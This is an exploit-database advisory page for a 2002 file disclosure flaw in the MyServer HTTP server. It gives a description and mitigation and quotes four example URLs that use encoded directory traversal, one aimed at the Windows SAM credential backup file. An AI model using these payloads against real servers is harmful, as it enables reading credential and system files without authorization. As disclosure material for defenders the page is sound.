header-logo
Suggest Exploit
vendor:
HTTP Server
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: HTTP Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

MyServer HTTP Server File Disclosure Vulnerability

MyServer HTTP server is prone to a file disclosure vulnerability. Encoded directory traversal sequences may be used to break out of the web root directory, allowing attackers to gain access to files that are readable by the web server.

Mitigation:

Ensure that the web server is configured to restrict access to files outside of the web root directory.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7944/info

The MyServer HTTP server is prone to a file disclosure vulnerability. Encoded directory traversal sequences may be used to break out of the web root directory. Attackers may gain access to files that are readable by the web server as a result.

http://www.example.com/%2e%2e/%2e%2e/%2e%2e
http://www.example.com/%2e%2e/%2e%2e/%2e%2ewinnt/repair/sam._
http://www.example.com/%2e%2e/logs
http://www.example.com/%2e%2e/system

Navigation

Suggest Exploit

Services By CQR